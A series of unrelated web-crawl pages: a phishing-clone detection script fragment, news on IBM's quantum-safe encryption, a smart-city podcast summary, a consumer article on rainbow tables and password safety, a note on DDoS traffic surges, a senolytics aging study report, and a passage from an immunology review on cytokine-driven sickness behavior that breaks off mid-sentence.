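            right = pixels[row * (size + 1) + col + 1]
            bits = (bits << 1) | (left > right)   # 1 if brightness drops to the right
    return bits

def hamming(a, b):
    # Number of differing bits between two fingerprints.
    return bin(a ^ b).count("1")

known_good = dhash("brand_login_reference.png")   # placeholder reference screenshot
candidate = dhash("suspicious_page.png")          # placeholder page under inspection
print("Likely clone" if hamming(known_good, candidate) <= 10 else "Looks different")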
<urn:uuid:f6eee252-da8e-430e-bee6-3462210a7eda>
CC-MAIN-2022-40
https://manvswebapp.com/improved-phishing-detection-using-perceptual-hashing
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00621.warc.gz
en
0.94076
647
2.625
3
IBM researchers have announced development of new “quantum safe” encryption techniques that they plan to deploy to the IBM Public Cloud in 2020. The techniques have also been prototyped as part of a quantum safe enterprise class tape system. According to the announcement, the new encryption algorithms are based on algebraic lattices, a class of mathematical problems that have not yet been shown to be susceptible to quantum computing solutions. The algorithms are implemented in “Cryptographic Suite for Algebraic Lattices” (CRYSTALS), a collection based on two primitives: Kyber, a secure key encapsulation mechanism, and Dilithium, a secure digital signature algorithm. IBM has donated the quantum safe algorithms to OpenQuantumSafe.org for developing additional open standards and has submitted them to NIST for standardization. Read more: Dark Reading
<urn:uuid:c1d64edc-2734-43fa-abf0-016c1537b8e8>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/ibm-announces-quantum-safe-encryption/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00021.warc.gz
en
0.927541
177
2.5625
3
Planning a Smart City – a podcast by ARC Advisory
ARC Advisory started a series of podcasts focused on Smart Cities. The first episode focuses on Planning a Smart City and looks deeper into the needed technology, the actors involved, and the development of such a complex infrastructure.
Larry O'Brien, Vice President of Research at ARC Advisory Group, and Jim Frazer, Vice President of Smart Cities, discuss the definition of a smart city. They define it as a public agency, encompassing cities, counties, states, provincial entities, or nations, that embraces IoT to drive digital transformation within its organization while serving private interests as well.
ARC identifies nine vertical applications required in a smart city: the built environment, the energy infrastructure, telecommunications, transportation and mobility, government services, water and wastewater, waste management, payments, and finance.
All nine applications mentioned above are impacted by technology. Jim Frazer explains the seven technologies that are fundamental in planning and building a smart city. These are: instrumentation and control with various metrics, connectivity, interoperability, cybersecurity and privacy, data management, computing resources, and analytics and business intelligence.
The two describe the earlier iterations of the concept: Smart City 1.0, which was supplier driven, and Smart City 2.0, which was driven by government decisions. The latest iteration, Smart City 3.0, is driven by a comprehensive view of all stakeholder needs and focuses on the impact it has.
Three steps are critical to successfully plan and implement a smart city. The first is to comprehensively define and understand the stakeholder communities and their needs. Once the problem is framed, the second step is to transform those needs into measurable functional requirements. The last step is to develop test plans and move through the project life cycle and implementation.
Efforts must be put into achieving the three pillars of sustainability: protection or enhancement of the natural environment; protection or enhancement of human quality of life and its societal aspects; and, most controversially, delivering the first two pillars in an economically sustainable manner.
Larry O'Brien and Jim Frazer conclude that, in the end, the smart city is about the quality of life for citizens and making sure we have a sustainable environment moving forward.
The podcast is structured as follows:
- The Nine Vertical Applications of a Smart City
- The Seven Technologies that Impact a Smart City
- Systems Engineering and Your Smart City
- The Three Pillars of Sustainability and Your Smart City Project
Read here the entire transcript of ARC Smart Cities Podcast Episode 1. For more resources on smart cities, visit the ARC Advisory Group website.
<urn:uuid:b3abcb4a-6ba7-491d-9973-4c4b33b44180>
CC-MAIN-2022-40
https://www.iiot-world.com/smart-cities-buildings-infrastructure/smart-cities/planning-a-smart-city-a-podcast-by-arc-advisory/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00021.warc.gz
en
0.929942
526
2.96875
3
Rainbow tables explained: Password hacking and how to protect against it
The name "rainbow table" may conjure up images of colorful furniture and dinner placemats, but in actuality, it's a technology hackers use to try and commandeer information from your online accounts. Most websites advance their security to prevent this, but even trusted technology enterprises like Github have been subject to such attacks. Instances like the 2016 attack on the shopping site Taobao left over 20 million users, 1 out of every 20 of their annual shoppers, vulnerable. This article will shed light on exactly how hackers exploit weaknesses—particularly in passwords—and what you can do to keep your accounts as safe as possible.
How hackers get your passwords
Tools for password cracking and recovery like Hashcat are available on the internet for cybersecurity professionals to perform penetration testing on systems to ensure their security. The unfortunate consequence is that tools like this can also find their way into the hands of cyber criminals.
To make websites as secure as possible, passwords aren't stored in a database themselves. Instead, when you create an account password, the website processes your password through a hashing algorithm. This algorithm turns the string of characters you chose into a different, fixed string (the hash) that is much more difficult to work backwards from. This means hackers don't obtain your actual password when they crack the website's database. The good news is that hashing is a one-way process, so your password can't be directly reverse-engineered from a discovered hash. The bad news? Once hackers find the hash, they can try to work out which password produces it, and that's where rainbow tables come in.
What is a rainbow table?
Rainbow tables are large collections of data that store common or weak passwords together with the hashes created from those passwords. After a breach, the attacker compares the hashes in the stolen database against the precomputed hashes in the rainbow table; a match reveals the original password. Hackers can then utilize this information to exploit a vulnerable network.
How to defend against rainbow table attacks
The measures you can take to keep your accounts safe from rainbow table attacks are extremely simple:
- Use long, mixed-case, elaborate passwords
- Don't use the same password for more than one account
- Enable 2 factor authentication on every possible account
Longer, more complex passwords mean more possibilities for a hacker to deal with. More possibilities equate to larger rainbow tables, which may demand more time than a hacker is willing to dedicate. You can even test the strength of your password to understand how much time it would take a hacker to crack your code.
Make sure not to use the same password for everything. If you do, hackers could use the single password they recover to access every account you have. It would be like using the same key for every lock you own. If you want to make this easier, you can use password management software that keeps a list of complex passwords that can only be unlocked by a master password of your choice.
Additionally, 2 factor authentication may be a slight annoyance every time you log in from a new device, but it's masterful at keeping your accounts protected. As long as you have this setting enabled, you'll be notified anytime someone tries to access your account.
If you're curious about cybersecurity yourself, you can also check out the Kali Linux operating system, a distribution designed for penetration testing that gives you a controlled environment to experiment with these tools.
Author Bio: As an English graduate, technology enthusiast, and Asian food connoisseur, Caleb is happy to talk tech with anyone. You can find more of his writings on caleb-writes.com.
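On the website side, the standard defense that makes precomputed rainbow tables useless is salting: every password gets a unique random value mixed in before hashing, so a table built in advance matches nothing. The sketch below uses only Python's standard library; the iteration count and example passwords are illustrative assumptions.

import hashlib
import hmac
import os

def hash_password(password):
    salt = os.urandom(16)   # unique random salt per account
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest      # store both alongside the account record

def verify(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    # Constant-time comparison avoids leaking information through timing.
    return hmac.compare_digest(candidate, digest)

salt, stored = hash_password("correct horse battery staple")
print(verify("correct horse battery staple", salt, stored))  # True
print(verify("password123", salt, stored))                    # False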
<urn:uuid:58a4382c-4093-40e0-860c-fc53e0ed4eb8>
CC-MAIN-2022-40
https://www.minim.com/blog/rainbow-tables-explained-password-hacking-and-how-to-prevent-against-it
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00021.warc.gz
en
0.94295
740
3.078125
3
What is a Distributed Denial of Service (DDoS) event? It is different from a DDoS "attack". Some, such as Arbor Networks, have dubbed it "The Tiger Effect". June 2008's U.S. Open Golf Championship 19-hole playoff resulted in massive traffic spikes from those seeking real-time scores and streaming video feeds. DDoS events are massive focal points of interest that sometimes arise on the Internet. They are surges that greatly exceed normal demand, and the result is a Denial of Service effect. Web servers just can't meet demand when these focus points occur, and the timing is not so easily predicted. And even though DDoS events lack malicious intent, the results can often be just as painful as an attack… Here's a recent example from two weeks ago: North Carolina's unemployment rate is at its highest level in 25 years, and a deluge of out-of-work people has strained the state's jobless systems to the breaking point. State [websites] have crashed twice in the past month as people apply or renew their employment benefits.
<urn:uuid:c88d46b0-34de-46d5-9b60-05f106c9497a>
CC-MAIN-2022-40
https://archive.f-secure.com/weblog/archives/00001587.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00021.warc.gz
en
0.963055
226
2.578125
3
What's the secret to aging well? University of Minnesota Medical School researchers have answered it: on a cellular level. Cell senescence is a process in which cells lose function, including the ability to divide and replicate, but are resistant to cell death. Such cells have been shown to affect neighboring ones because they secrete several pro-inflammatory and tissue remodeling molecules. Aging starts in our cells, and those aging cells can hasten cellular senescence, leading to tissue dysfunction and related health impacts. New research involving University of Minnesota Medical School faculty Paul D. Robbins and Laura J. Niedernhofer, recently published in Nature Medicine, shows there are types of small molecules called senolytics that can reverse the impact of aged, senescent cells. "We've always thought of aging as a process, not a disease," said Dr. Robbins, Associate Director of the newly founded Institute on the Biology of Aging and Metabolism (iBAM). "But what if we can influence the impacts of aging at a cellular level to promote healthy aging? That's what senolytics seeks to achieve." The research determined whether introducing senescent cells to human and animal tissue would impact the cellular health of surrounding cells. Surprisingly, the transplant of a relatively small number of senescent cells caused persistent physical dysfunction as well as the spread of cellular senescence in previously healthy cells. In addition, researchers found that a high-fat diet, which causes a type of metabolic stress, or simply being old, enhances the physical dysfunction that comes from senescent cells. "Previous research has shown that our immune system's ability to eliminate or deal with senescent cells is based 30 percent on genetics and 70 percent on environment," said Dr. Robbins, noting that what we eat and how often we exercise can affect senescence or aging of cells. Conversely, the researchers determined that treatment with senolytic drugs, able to eliminate senescent cells, can reverse physical dysfunction and actually extend lifespan even when used in aged animal models. "We saw greater activity, more endurance, and greater strength following use of senolytics," said Dr. Robbins. The paper notes that the results provide proof-of-concept evidence that improved health and lifespan in animals is possible by targeting senescent cells. The hope is that senolytics will prove effective in alleviating physical dysfunction and resulting loss of independence in older adult humans as well. "This area of research is promising, not just to address the physical decline that comes with aging, but also to enhance the health of cancer survivors treated with radiation or chemotherapy – two treatments that can induce cell senescence," said Laura Niedernhofer, Director of iBAM. This study was done in collaboration with James Kirkland, MD, Ph.D., and Tamara Tchkonia, Ph.D., Mayo Clinic.
Source: Krystle Barbour – University of Minnesota Medical School
Image Source: image is adapted from the University of Minnesota news release.
Original Research: Abstract for "Senolytics improve physical function and increase lifespan in old age" by Ming Xu, Tamar Pirtskhalava, Joshua N. Farr, Bettina M. Weigand, Allyson K. Palmer, Megan M. Weivoda, Christina L. Inman, Mikolaj B. Ogrodnik, Christine M. Hachfeld, Daniel G. Fraser, Jennifer L. Onken, Kurt O. Johnson, Grace C. Verzosa, Larissa G. P. Langhi, Moritz Weigl, Nino Giorgadze, Nathan K. LeBrasseur, Jordan D. Miller, Diana Jurk, Ravinder J. Singh, David B.
Allison, Keisuke Ejima, Gene B. Hubbard, Yuji Ikeno, Hajrunisa Cubro, Vesna D. Garovic, Xiaonan Hou, S. John Weroha, Paul D. Robbins, Laura J. Niedernhofer, Sundeep Khosla, Tamara Tchkonia & James L. Kirkland in Nature Medicine. Published July 9 2018.
<urn:uuid:7a7ff432-2386-4edf-83f1-2ee308cdf13b>
CC-MAIN-2022-40
https://debuglies.com/2018/10/03/a-new-study-reports-it-is-possible-to-reverse-the-effects-of-aging/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00221.warc.gz
en
0.897519
911
3.046875
3
Surrounded by coworkers who are sniffling and sneezing? You may not be able to ask for sick leave preemptively, but your body is already bracing for battle, says Patricia C. Lopes, assistant professor of biological sciences at Chapman University’s Schmid College of Science and Technology. Lopes studies how our bodies and behaviors change once we become sick. “Our physiology, particularly the immune system — the system that protects the body from invaders — is tightly regulated,” says Lopes. “Once we become sick, our physiology can drastically change to support recovery from the disease.” Lopes’ article in the British Ecological Society journal Functional Ecology “Anticipating infection: How parasitism risk changes animal physiology” highlights research showing that there are scenarios in which our physiology changes prior to becoming sick, when disease risk is high. “In other words,” Lopes, explains, “our brains can obtain information from diseased people and then elicit changes to our physiology. For example, observing images of sick people can already trigger activation of the immune system.” From a big picture perspective, this means that parasites affect our lives much more than previously considered, because they are already affecting our physiology even before they invade us, she says. “How this ability to change physiology before getting sick helps animals cope with, or recover from disease is not well known, but could have major impacts on how diseases spread, and on how we care for and study sick humans and other sick animals,” Lopes says. Immune activation, body and brain The body manages to respond to infectious agents, such as bacteria, yeast and viruses, with a common set of symptoms despite a lack of similarities between these types of pathogens. It does this by focusing the response through sentinel cells located throughout the body (Fig. 1). These first responders form the base of the innate immune system. Monocytes are considered critical first responders and monitor the circulating fluids whereas differentiated monocyte-derived cells monitor other fluids and are resident in all tissues (examples: peritoneal macrophages → peritoneal cavity; Kupffer cells → liver; giant cells and histiocytes → connective tissue; dust cells and alveolar macrophages → lungs; and osteoclasts → bone) (Douglas and Musson, 1986). These monocytic cells, along with resident dendritic cells, respond to a variety of signals including infectious agents and a variety of factors produced by the host organism that are released following trauma, autoimmune responses or abnormal accumulation of endogenous molecules (Magrone and Jirillo, 2012). In any case, the cells of the innate immune system then respond with the initiation of an inflammatory response that leads to a mirrored immune response within the central nervous system (CNS), often referred to as neuroinflammation. A bout of neuroinflammation results in behavioral consequences. Altered behavior is dependent on changes in neuronal activity, although specific loci within the CNS that mediate each of these responses have not been clearly defined. If the inflammatory response is fully resolved and does not involve death of cells within the brain, then behavior returns to normal. If neuroinflammation is extremely strong or prolonged, cell death within the CNS results in irreversible loss of function: functio laesa, identified as the fifth sign of acute inflammation. Focusing the innate immune response. 
Insults to the body, from the outside or from the inside, activate cells of the innate immune system. The immune response transmits this information to the brain to cause physiological and behavioral responses. A mild inflammatory response – such as a low-grade infection, trauma (such as dropping a weight on one’s foot) or even strenuous exercise – results in reversible consequences as they are a result of altered cellular (neuron) function. A severe response induces often irreversible consequences as a result of cell death. In either case, the causal event is initiated by monocytic and dendritic cells with the initiation of an inflammatory response. Recognition of infection is a first and most critical step in the development of an appropriate physiological response to fight infection and to initiate appropriate changes in behavior. Recognition of pathogens by monocytes and dendritic cells is mediated by several classes of receptors collectively referred to as pattern-recognition receptors (PRRs). Unlike receptors for cytokines, growth factors or hormones, which each recognize a specific moiety present only on a small subset of highly conserved ligands, PRRs recognize classes of molecules termed pathogen-associated molecular patterns (PAMPs). These patterns are not normally present on endogenous extracellular molecules derived from the host, although DAMPs (damage-associated molecular patterns) are found on molecules released from dying host cells that can activate PRRs (Jeannin et al., 2008). Thus, PAMPs are recognized by PRRs as non-self-molecules and DAMPs as self-molecules, both of which elicit activation of the innate immune system; one in an attempt to remove infectious materials and the other to remove damaged tissue. Fig. 2 illustrates the best-characterized members of the Toll-like receptors (TLRs), the most widely studied PRRs. In order to assure recognition of pathogens, TLRs have evolved to recognize proteins, lipids and unmodified nucleic acid molecules found on infectious pathogens. Extracellular pathogens, for example many bacteria, are recognized by trans-membrane TLRs that have their PAMP recognition moieties on the outside of the plasma membrane. TLRs 5, 11, 2/1 heterodimers, 2/6 heterodimers, 4 and 9 fall under this category. Intracellular pathogens, for example viruses or bacterial components released from extracellular pathogens that enter cells, are recognized by TLRs localized within the responsive cell. These TLRs are localized to endosomes and lysosomes within the cells. PAMP association with TLRs induces intracellular signaling cascades through two major pathways. Most of the TLRs associate with myeloid differentiation primary response gene 88 (MyD88), which is a universal adapter protein designed to recruit intracellular enzymes that initiate a cascade to eventually activate NF-κB (Fig. 2). Translocation of NF-κB to the cell nucleus directly activates gene transcription of, among other things, pro-inflammatory cytokines such as TNFα, IL-1β and type II interferon (IFNγ). Of the well-characterized TLRs, only TLR3, which responds to dsRNA, strictly associates with TRIF to activate IRF3 and directly induce the expression of type I interferons. TLR4 activates both pathways, and TLR9 induces type I interferon (IFNα) expression through NF-κB. 
Although there is considerable overlap and varying crosstalk across the MyD88 and TRIF pathways, the MyD88 response is more strongly keyed to fight bacterial infections whereas the induction of type I IFN plays a key role in fighting viral infections. Expression of cytokines by monocytic and dendritic cells then recruits and activates other cells of the immune system to fight infections.
Fig. 2. Classification of Toll-like receptors (TLRs). All TLRs recognize bacteria pathogen-associated molecular patterns (PAMPs) of protein, lipid or nucleotide composition. Approximately half recognize viral PAMPs, either lipids or nucleotides. TLR2/6 and TLR4 recognize fungal PAMPs whereas TLR9 and TLR11 recognize protozoan PAMPs. Several of the TLRs respond to extracellular ligands (1, 2, 4, 5, 6, 9 and 10 not shown) whereas others localize to cellular vesicles and respond to PAMPs that have been internalized by the cell (3, 7, 8, 9 and murine 11; human TLR11 is a pseudogene). Although some of the TLRs also activate proliferation of immune cells through an Akt-dependent pathway (not shown), they all induce the expression and secretion of cytokines. Cytokine production is largely responsible for behavioral changes induced by infection. All TLRs shown (TLR10 cooperates with TLR2 to recognize triacylated lipoproteins but does not activate typical TLR signaling) (Guan et al., 2010), except TLR3, directly induce the expression of TNFα, IL-1β and IFNγ whereas TLR3, 4, 7 and 9 activation results primarily in IFNα and IFNβ expression (Hanke and Kielian, 2011). A brief list of PAMPs or active analogs is shown for each TLR. For definitions, see List of abbreviations.
Similar to TLRs, nucleotide-binding oligomerization domain (Nod) proteins initiate an inflammatory response following activation by peptidoglycans derived from bacteria (Fig. 3). Activation of Nod1 or Nod2 increases association of Nod proteins with RIPK or RICK. This association leads to eventual NF-κB activation and, like TLR activation, cytokine and type II interferon expression.
Fig. 3. Classification of nucleotide-binding oligomerization domain proteins (Nods). Similar to TLRs, Nod1 and Nod2 are pattern recognition receptors (PRRs) responding to pathogen-associated molecular patterns (PAMPs) of bacterial origin (Newton and Dixit, 2012). Both Nods are localized to the cytoplasm, requiring either phagocytosis of bacteria and subsequent peptidoglycan entry into the cytoplasm or uptake of peptidoglycan by endocytosis, peptide transporters or pore-forming toxins. Nod1 is distributed across tissues and cell types whereas Nod2 is localized principally to leucocytes but can be induced in epithelium (Clarke and Weiser, 2011; Newton and Dixit, 2012). The primary difference between TLRs and Nods (and Nod-like receptors, NLRs) is the identity of the ligand and intracellular pathway. RICK or RIPK/RIP-2 initiate the eventual activation of NF-κB, as compared to MyD88 or TRIF. Similar to TLRs, Nods induce the expression and secretion of cytokines. For definitions, see List of abbreviations.
Pathways that mediate inflammation-induced behavior
After recognition of the infectious agent, a signal must be received by the brain for behavioral changes to ensue. There are two major routes by which infections influence behavior. The neural and humoral routes both provide input to the brain (Fig. 4). When activated, both pathways elicit behavioral responses and, as described below, the importance of each pathway is dependent on the site of infection.
The existence of a neural component is supported by early observations that sensory processing is necessary for development of heat and for the sensation of pain at the site of infection (these are two classic inflammation signs: calor and dolor). With the discovery of the blood–brain barrier (BBB), which was originally believed to exclude proteinaceous signals from the brain, afferent input was thought to be the major signaling pathway from the periphery to the brain that was responsible for behavioral changes. Neural and humoral activation of the brain by the periphery. Peripheral infections alter behavior by communicating with the brain via neural and humoral pathways. The neural pathway occurs via afferent nerves. As an example, the vagal nerve has a proven role in mediating infection-induced behavior. The afferent vagus projects to the nucleus tractus solitaries (NTS) → parabrachial nucleus (PB) → ventrolateral medulla (VLM) before proceeding to the paraventricular nucleus of the hypothalamus (PVN), supraoptic nucleus of the hypothalamus (SON), central amygdala (CEA) and bed nucleus of the stria terminalis (BNST). The CEA and BNST, which are part of the extended amygdala, then project to the periaqueductal gray (PAG). By these pathways, activation of the vagus by abdominal or visceral infections influences activity of several brain regions implicated in motivation and mood. The humoral pathway involves delivery of PAMPs or cytokines from the peripheral site of infection directly to the brain. Active transport into the brain across the blood–brain barrier (BBB), volume diffusion into the brain or direct contact with brain parenchymal cells at the choroid plexus (CP) and circumventricular organs [median eminence (ME), organum vasculosum of the laminae terminalis (OVLT, i.e. supraoptic crest), area postrema (AP) and suprafornical organ (SFO)] that lie outside the BBB all transpose the peripheral signal into a central neuroinflammatory response that mirrors the response at the periphery (Dantzer et al., 2008). Indeed, early studies found that lipopolysaccharide (LPS) given intraperitoneally (i.p.) caused a rapid increase in c-fos immunoreactivity within the nucleus tractus solitaries (NTS) (Wan et al., 1993). This marker of neuron activation localized to primary and secondary areas of projection of the vagus (Fig. 4). Similarly, the trigeminal nerve activates neurons within the hypothalamus known to control feeding behavior (Malick et al., 2001). Subdiaphragmatic vagotomy drastically reduces the sickness response to i.p. LPS, clearly illustrating that neural input to the brain is directly responsible for a significant part of the early behavioral changes associated with some infections (Bluthé et al., 1996a; Bluthé et al., 1996b; Bretdibat et al., 1995; Watkins et al., 1994). In contrast to these findings, vagotomy does not block the pyrogenic action of LPS when LPS is administered i.p. (Hansen et al., 2000; Luheshi et al., 2000). Vagotomy also does not block the induction of sickness behavior by i.v. (intravenous) or s.c. (subcutaneous) LPS (Bluthé et al., 1996a; Bluthé et al., 1996b). These later findings suggest that additional, humoral pathways are also able to mediate the ability of infections to modulate behavior. Even after vagotomy, i.p. LPS increases IL-1β levels within the brain (Van Dam et al., 2000) and vagotomy does not attenuate the ability of LPS to increase circulating cytokine levels (Gaykema et al., 2000; Hansen et al., 2000). 
When it was found that circulating cytokines could enter the brain by active transport, that cytokines could be produced at the BBB in response to circulating PAMPs and that cytokines could enter the brain by volume diffusion at the circumventricular organs (Fig. 4) (Quan and Banks, 2007), it was clear that behavioral responses that occur in response to i.v. and s.c. PAMPs or cytokines are transcribed by the brain in response to humoral signals. Similarly, some of the behaviors that occur in response to i.p. challenges have a humoral component even after vagotomy (Gaykema et al., 2000; Hansen et al., 2000). It is clear, however, that all behavioral responses to infection have a cytokine basis, as even i.p. LPS induces a CNS inflammatory response corresponding to the sites of c-fos activation by the vagal nerve afferent projections (Konsman et al., 2008). Thus, intraperitoneal or meningeal infections induce behavioral changes that are partially mediated by neural afferents through the vagal and trigeminal nerves, respectively. These afferent nerves induce an inflammatory response and cytokine expression in the brain, thereby providing the cytokine component of the neural pathway. In contrast, other peripheral sites of infection have a stronger dependence on the humoral pathway with the induction of local cytokines or release of PAMPs, which enter the circulation and then act directly at the level of the CNS. The level of infection is roughly proportionate to the level of CNS cytokine production and is related to the behavioral changes. One of the early issues that arose from these associations was the identity of the cytokines responsible for behavioral responses.
IL-1β and behavior
Fig. 5. Cytokine intracellular signaling pathways. Cytokines bind to transmembrane allosterically regulated proteins. Upon ligand binding, the intracellular signaling pathways that are activated correlate to their ability to alter behavior. Three classic proinflammatory cytokines – TNFα, IL-1β and IL-6 – activate cascades leading to NF-κB and MAPK (p38 and JNK) activation. The MAPK cascade is enhanced by parallel signaling pathways that produce ceramide. In contrast, IFNγ, IFNα/β and IL-6 signal primarily through the JAK/STAT pathway. The NF-κB, MAPK and JAK/STAT pathways are considered proinflammatory, inducing a feed-forward cytokine inflammatory response. The ceramide-generating and MAPK pathways have distinct enhancing and inhibitory effects on neuron excitation.
Fig. 6. Expression of pattern recognition receptors (PRRs) and proinflammatory cytokine receptors in the brain. Although most infections occur at the periphery, the cells of the central nervous system (CNS) are the ultimate mediators of changes in behavior. Receptors within the CNS for pathogen-associated molecular patterns (PAMPs) and proinflammatory cytokines are divided into two categories, intracellular (green boxes) and those that span the plasma membrane. PAMPs reaching the CNS parenchyma can directly activate microglia, which, like other monocyte-derived cells, possess a full complement of TLRs. Thus, microglia are able to respond to PAMPs or peripherally derived cytokines with a central induction of proinflammatory cytokine expression. Astrocytes and neurons have a very limited ability to respond to PAMPs. Neurons only possess intracellular TLRs and Nod2.
In contrast, neurons have cell surface receptors for proinflammatory cytokines, TNFα (Bette et al., 2003), IL-1β (French et al., 1999), low expression of IL-6 (Lehtimäki et al., 2003), type I IFNα/β (Paul et al., 2007) and limited (region-specific) expression of the type II IFNγ receptor (Chesler and Reiss, 2002). The absence of most of the bacterial recognition TLRs on neurons indicates that the effects of an extracellular bacterial infection on behavior are secondary to activation of other cells of the CNS, primarily microglia. In contrast, neurons are directly responsive to cytokines. By far the most abundant literature related to IL-1β regards its action as a pro-inflammatory cytokine, i.e. induction of local inflammation, immune cell recruitment and necessity to rapidly clear infections. The IL-1β → IL-1R1 → NF-κB pathway is predominant in monocytes, including brain microglia (Srinivasan et al., 2004), and this pathway leads to elevated cytokine expression, further monocyte/microglia activation and astrocyte activation within the CNS. By themselves, these actions have no direct means to alter behavior as neuron function per se is not altered. In contrast, IL-1β interaction with IL-1R1 on neurons has a greater induction of the MAPK pathways and MyD88-dependent Src activation (Davis et al., 2006; Srinivasan et al., 2004) than it does with non-neuronal cells. Within the hippocampus, IL-1β acts through the MAPKs, p38 and JNK (Fig. 5) to inhibit neuron long-term potentiation (LTP) via an inhibition of calcium channels (Schäfers and Sorkin, 2008; Viviani et al., 2007). In contrast, IL-1β may also have a direct excitatory effect on neurons mediated by an increase in ceramide (a family of lipids that act as intracellular signaling molecules) synthesis and subsequent NMDA-mediated calcium influx (Viviani et al., 2003). Thus, the presence of IL-1β within the CNS directly alters neuron function. Despite these responses by neurons, it remains unknown if either inhibition of LTP, via MAPKs, or neuron excitation, via ceramide, is responsible for IL-1β’s ability to act within the CNS to induce sickness behavior. However, it is clear that IL-1β administered at very low levels induces a potent sickness response (Bluthé et al., 2006). Of note, to date there are no reports that IL-1β is necessary for the development of depressive-like behaviors. TNFα and behavior TNFα within the brain can derive from peripheral expression, expression within the brain dependent on neural input (Marquette et al., 2003), secretion within the brain in response to humoral stimuli by PAMPs or cytokines (Bluthé et al., 2002; Churchill et al., 2006; Park et al., 2011b) or exogenous addition to the brain (Bluthé et al., 2006). Current dogma suggests that all sources have the same behavioral effect: TNFα induces sickness behavior, reminiscent of the actions of IL-1β. TNFα administration to the periphery causes the entire spectrum of sickness, including fever, weight loss and changes in motivated behavior (Bluthé et al., 1994). There is a strong correlation between infection-related TNFα expression in the periphery and the degree of sickness behavior, as blocking cytokine expression during inflammation attenuates sickness behavior (O’Connor et al., 2009b). TNFα was shown to act through TNF-R1 to induce sickness (Palin et al., 2007). Mice lacking TNF-R2 respond to TNFα with a full spectrum of sickness whereas TNF-R1 KO mice are refractory to TNFα. 
This finding supported earlier work using human recombinant TNFα, which binds murine TNF-R1 but not murine TNF-R2 and induces sickness behavior (Bluthé et al., 1991; Bluthé et al., 1994). Unlike the IL-1R2, TNF-R2 is a fully functional trans-membrane receptor that signals similar to TNF-R1 except for an inability to activate ceramide synthesis (MacEwan, 2002). Importantly, within the brain, TNF-R1 is localized primarily to neurons and TNF-R2 is localized primarily to glia (Fig. 6). This finding, together with the KO experiments, suggests that TNFα induces behavioral changes by interacting with neuronal TNF-R1. TNFα changes NMDA-R processing through ceramide via TNR-R1, in one case increasing NR1 phosphorylation and clustering via activation of ceramide production (Wheeler et al., 2009). Through this mechanism, TNFα increases hippocampal neuron calcium flux and excitatory postsynaptic currents (EPSCs). In separate studies, the effect of TNFα was found to be related to time of exposure. A short exposure to TNFα enhances synaptic transmission, EPSCs and AMPA-R insertion into neuronal membranes whereas a longer exposure, more than 50 min, inhibits LTP (Beattie et al., 2002; Tancredi et al., 1992). Whether AMPA-R insertion or decreased LTP is ceramide dependent in these later examples is unknown; however, prolonged exposure to TNFα decreases Ca2+ currents in response to glutamate and this action was mimicked by added ceramide (Furukawa and Mattson, 1998). Thus, as for IL-1β, TNFα directly acts on neurons to alter excitation through the stimulation of ceramide synthesis. Importantly, ceramide production by TNFα occurs through the activation of neutral-sphingomyelinase (N-SMase) (Fig. 5). N-SMase activation requires the activation of factor-associated with N-SMase (FAN). We used FAN-deficient mice to show that this pathway is required for TNFα-, but not LPS-, induced sickness behavior (Palin et al., 2009). The induction of sickness by TNFα also required TNF-R1 and not TNF-R2, only the former activating ceramide synthesis through FAN (Palin et al., 2009). LPS was still able to induce sickness in the absence of FAN, suggesting that the induction of other cytokines, such as IL-1β, is adequate to induce sickness and that their actions are not FAN dependent. These data, however, do show that TNFα-induced sickness behaviors require ceramide production via TNF-R1 on neurons. These data also strongly suggest that IL-1β-induced ceramide production and subsequent changes in neuron activity may mediate its behavior-modifying activity. Although data pertaining to ceramide production suggest a mechanism of action for both IL-1β- and TNFα-induced sickness, the MAPK pathway is also required for TNFα to induce sickness. An inhibitor of JNK activation, D-JNKI-1, blocks TNFα-induced sickness (Palin et al., 2008). As mentioned above, TNF-R1 is primarily localized to neurons within the CNS (Bette et al., 2003). It is not known if the activation of JNK by TNFα, as a prerequisite for sickness, occurs within neurons or within glia through TNF-R2 (Fig. 5). Attenuation of glia activation by the inhibition of JNK could act to decrease the net inflammatory response (Relja et al., 2009) and thus decrease the ability of the brain to express cytokines, which could then act on neurons. In any case, it is clear that proinflammatory cytokines act by at least two pathways to fully induce sickness. There is new direct evidence that TNFα may be involved in depressive-like behavior. 
A very recent study (Kaster et al., 2012) used extremely low doses of TNFα administered i.c.v. to show that TNFα within the brain causes depressive-like behavior. Depressive-like behavior was assessed as increased time of immobility during the FST and TST. This low dose of TNFα did not change locomotor activity (an index of sickness behavior), thus dissociating the two types of behavior as TNFα sensitive and TNFα insensitive (Kaster et al., 2012). They also showed that TNF-R1-deficient mice and mice treated with a neutralizing antibody to TNFα had a decreased time of immobility during the FST, an anti-depressant response. No such direct evidence is available wherein IL-1R1 mediates depressive-like behavior. This study supports earlier work showing that TNF-R1- or TNF-R2-deficient mice have a lower immobility during the FST, indicative of attenuated helplessness/despair. These mice also have increased consumption of a sucrose solution, indicative of a hedonic response being mediated through TNF-Rs. These mice have normal LMA, indicative of the absence of sickness behavior, and unchanged performance in an elevated plus maze; thus, no evidence for changes in anxiety (Simen et al., 2006). Thus, the loss of either neuronal TNF-R1 or glial TNF-R2 elicits an anti-depressant response. Taken together, these data indicate that both TNF-R1 and TNF-R2 are involved in depressive-like behavior. IL-6 and behavior Unlike IL-1β and TNFα, IL-6 does not, by itself, elicit behavioral changes despite the induction of fever and activation of the hypothalamic-pituitary-adrenal (HPA) axis (Lenczowski et al., 1999). These data can be interpreted in several ways but they suggest that induction of fever and an HPA response are not directly responsible for behavioral changes and are indeed distinct responses. These data do not suggest that IL-6 has no effect on behavior. In contrast, IL-6 is necessary for a full sickness response. Soluble gp130, a natural inhibitor of interleukin-6 receptor trans-signaling responses, administered i.c.v. prior to LPS 